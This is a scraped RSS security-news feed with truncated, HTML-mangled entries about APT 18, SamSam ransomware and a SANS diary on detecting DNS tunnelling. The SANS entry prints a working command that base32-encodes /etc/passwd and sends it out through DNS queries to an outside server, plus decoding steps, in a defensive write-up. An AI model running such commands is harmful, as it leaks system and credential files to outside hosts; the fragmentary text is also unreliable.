This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-18T12:39:46+00:00 www.secnews.physaphae.fr RedTeam PL - DarkTrace: AI bases detection https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon] which supports DNS queries in event ID 22 (DNSEvent).The DNS queries used below that end with ]]> 2019-08-14T21:45:48+00:00 https://blog.redteam.pl/2019/08/threat-hunting-dns-firewall.html www.secnews.physaphae.fr/article.php?IdArticle=1798891 False Spam,Malware,Threat,Guideline APT 18 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC breach portal (as of November 30, 2018). This includes the likes of unauthorized access or disclosures of patient data, hacking, theft of data, data loss and more. Bottom line, if you’re tasked with protecting any entity operating in the healthcare sector, you’re likely experiencing some very sleepless nights — and may just need a doctor yourself. So . . . who’s wreaking all this havoc and how? According to AlienVault Labs, opportunistic ransomware is still a preferred method of attack. However, researchers are reporting a rise in the number of targeted ransomware attacks in the healthcare sector. These attacks are often backed by organized criminals who see opportunities for making money from healthcare providers and other similar entities who must protect and keep assets, systems, and networks continuously operating. One such criminal group operating the SamSam ransomware is thought to have earned more than $5 million dollars by manually compromising critical healthcare networks (see below for more info). The group behind SamSam has invested heavily in their operations (likely an organized crime syndicate) and has won the distinction of being the subjects of two FBI Alerts in 2018. And, according to AlienVault Labs, the methods used by SamSam are more akin to a targeted attack than typical opportunistic ransomware. SamSam attacks also seem to go in waves. One of the most notable was a spring 2018 hit on a large New York hospital which publicly declined to pay the attacker’s $44,000 ransomware demand. It took a month for the hospital’s IT system to be fully restored.   SamSam attackers are known to: Gain remote access through traditional attacks, such as JBoss exploits Deploy web-shells Connect to RDP over HTTP tunnels such as ReGeorg Run batch scripts to deploy the ransomware over machines SamSam isn’t going away either. AlienVault Labs has seen recent variants. You might want to read more about the threat actors behind SamSam, their methods of attacks, and recommendations for heading ]]> 2018-12-20T14:00:00+00:00 https://feeds.feedblitz.com/~/588421296/0/alienvault-blogs~Let%e2%80%99s-Chat-Healthcare-Threats-and-Who%e2%80%99s-Attacking www.secnews.physaphae.fr/article.php?IdArticle=956718 False Threat APT 23,APT 19,APT 18,Wannacry,APT 22 None SANS Institute - SANS est un acteur de defense et formation 1] states that a DNS query length is255 characters total with each subdomain being 63 characters or less. By using Base32 encoding[2], we can encode our data instrings compatible with the DNS requirements: A-Z, 0-9 and - padding:5px 10px"> $ cat /etc/passwd | base32 -w 63 | while read L do dig $L.data.rootshell.be @192.168.254.8 done Note: the parameter -w 63 padding:5px 10px"> $ grep data.rootshell.be queries.log 20-Apr-2017 08:32:11.075 queries: info: client 172.x.x.x#44635: query: OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.113 queries: info: client 172.x.x.X#50081: query: YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.173 queries: info: client 172.x.x.x#40457: query: QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.222 queries: info: client 172.x.x.x#56897: query: 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.276 queries: info: client 172.x.x.x#57339: query: GOTYHI2DUNRVGUZTIOTTPFXGGORPMJUW4ORPMJUW4L3TPFXGGCTHMFWWK4Z2PA5.data.rootshell.be IN A +E (192.168.254.8) ... To decode this on the attacker padding:5px 10px"> $ grep data.rootshell.be queries.log | cut -d -f8 | cut -d . -f1| base32 -d | more root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin ... We don padding:5px 10px"> # tcpdump -vvv -s 0 -i eth0 -l -n port 53 | egrep A\? .*\.data\.rootshell\.be tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 172.x.x.x.40335 192.168.254.8.53: [udp sum ok] 9843+ [1au] A? OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be. ar: . OPT UDPsize=4096 (110) 172.x.x.x.35770 192.168.254.8.53: [udp sum ok] 19877+ [1au] A? YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be. ar: . OPT UDPsize=4096 (110) 172.x.x.x.41463 192.168.254.8.53: [udp sum ok] 29267+ [1au] A? QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be. ar: . OPT UDPsize=4096 (110) 172.x.x.x.38048 192.168.254.8.53: [udp sum ok] 30042+ [1au] A? 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be. ar: . OPT UDPsize=4096 (110) ... As you can see, we just used standard DNS requests to exfiltrate data. To detect this, keep an eye on your DNS logs and particularlythe query length. The following graph width:770px" /> But, as usual, not all big DNS queries are suspicious. Some CDNs padding:5px 10px"> hxxps://2ecffd01e1ab3e9383f0-07db7b9624bbdf022e3b5395236d5cf8.ssl.cf4.rackcdn.com/Product/178ee827-0671-4f17-b75b-2022963f5980.pdf To reduce the risk of false positives, this control can be combined with others: The volume of traffic per IP The volume of traffic per (sub-)domain White-lists This technique is not new but comes back regularly]]> 2017-04-20T07:07:42+00:00 https://isc.sans.edu/diary.html?storyid=22326&rss www.secnews.physaphae.fr/article.php?IdArticle=359221 False None APT 18 None SC Magazine - Magazine ]]> 2016-05-25T16:10:43+00:00 http://feedproxy.google.com/~r/SCMagazineHome/~3/ulEN7tx-dLc/ www.secnews.physaphae.fr/article.php?IdArticle=2048 False None APT 18 None Palo Alto Network - Site Constructeur 2016-05-24T18:30:30+00:00 http://feedproxy.google.com/~r/PaloAltoNetworks/~3/5bLoy0nX--8/ www.secnews.physaphae.fr/article.php?IdArticle=1988 False None APT 18 None Mandiant - Blog Sécu de Mandiant patch pour la vulnérabilité le 8 juillet 2015. Avant ce patcha été publié, les groupes ont lancé des campagnes de phishing contre plusieurs sociétés de l'aérospatiale et de la défense, de la construction et de l'ingénierie, de l'éducation, de l'énergie

---

  The FireEye as a Service team detected independent phishing campaigns conducted by two Chinese advanced persistent threat (APT) groups that we track, APT3 and APT18. Each threat group quickly took advantage of a zero-day vulnerability (CVE-2015-5119), which was leaked in the disclosure of Hacking Team\'s internal data. Adobe released a patch for the vulnerability on July 8, 2015. Before that patch was released, the groups launched phishing campaigns against multiple companies in the aerospace and defense, construction and engineering, education, energy]]> 2015-07-13T08:31:00+00:00 https://www.mandiant.com/resources/blog/demonstrating-hustle www.secnews.physaphae.fr/article.php?IdArticle=8377805 False Vulnerability,Threat APT 18,APT 3 4.0000000000000000